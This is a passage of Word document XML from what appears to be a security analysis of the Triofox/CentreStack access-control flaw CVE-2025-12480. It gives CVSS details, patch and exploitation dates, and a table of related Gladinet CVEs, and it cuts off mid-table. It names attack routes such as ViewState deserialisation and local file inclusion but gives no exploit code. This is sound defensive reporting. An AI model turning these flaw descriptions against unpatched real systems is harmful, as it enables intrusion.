              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>CVSS 3.1 base score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6236"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>9.1 (Critical)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3118"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>CVSS 3.1 vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6236"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3118"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Affected software</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6236"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Triofox (and CentreStack) before 16.7.10368.56560</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3118"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Fixed version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6236"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>16.7.10368.56560, released 26 July 2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3118"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Version exploited in the wild</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6236"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>16.4.10317.56372</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3118"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Record published</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6236"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>10 November 2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3118"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Added to CISA KEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6236"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>12 November 2025 (remediation due 3 December 2025)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3118"/>
            <w:vAlign w:val="center"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Attributed activity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6236"/>
            <w:vAlign w:val="center"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>UNC6485 (Google Threat Intelligence Group)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>The CVSS vector is worth reading rather than just scoring. The attack is network-reachable (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>AV:N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>), needs low complexity and no privileges or user interaction (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>AC:L/PR:N/UI:N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>), and causes high confidentiality and integrity impact. Availability is scored none (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>A:N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>): the flaw hands an attacker the system rather than denying it to others. A score of 9.1 rather than a maximal 10.0 reflects that unchanged scope and absent availability impact, not any difficulty in exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="180" w:after="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>3.2  A family of flaws, not an isolated bug</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>The Triofox and CentreStack line had already been under pressure through 2025, which matters for how defenders should read this incident. Table 2 lists the related CVEs. The pattern is consistent: unauthenticated or low-privilege access flaws in an internet-facing product, each quickly exploited after disclosure. CVE-2025-12480 was not a zero-day; Gladinet had shipped the fix on 26 July 2025, roughly a month before the first observed exploitation on 24 August 2025</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="737373"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> [documented]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>. The gap between a patch being available and being applied is where this campaign lived.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160" w:after="60"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 2.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Related actively exploited vulnerabilities in the Gladinet product family, 2025.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblW w:w="9355" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1587"/>
        <w:gridCol w:w="1871"/>
        <w:gridCol w:w="4876"/>
        <w:gridCol w:w="1020"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1587"/>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1871"/>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Weakness</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4876"/>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1020"/>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1587"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>CVE-2025-30406</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1871"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Use of hard-coded cryptographic key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4876"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Hard-coded ASP.NET machine key enables ViewState deserialisation RCE; exploited from March 2025.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1020"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>9.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1587"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>CVE-2025-11371</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1871"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Improper limitation of a pathname (LFI)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4876"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Unauthenticated local file inclusion exposes </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Web.config</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> and the machine key; exploited from late September 2025.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1020"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>6.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1587"/>
            <w:vAlign w:val="center"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>CVE-2025-12480</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1871"/>
            <w:vAlign w:val="center"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Improper access control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4876"/>
            <w:vAlign w:val="center"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Setup pages reachable post-install via </w:t>
            </w:r>
            <w:r>
              <w:rPr>
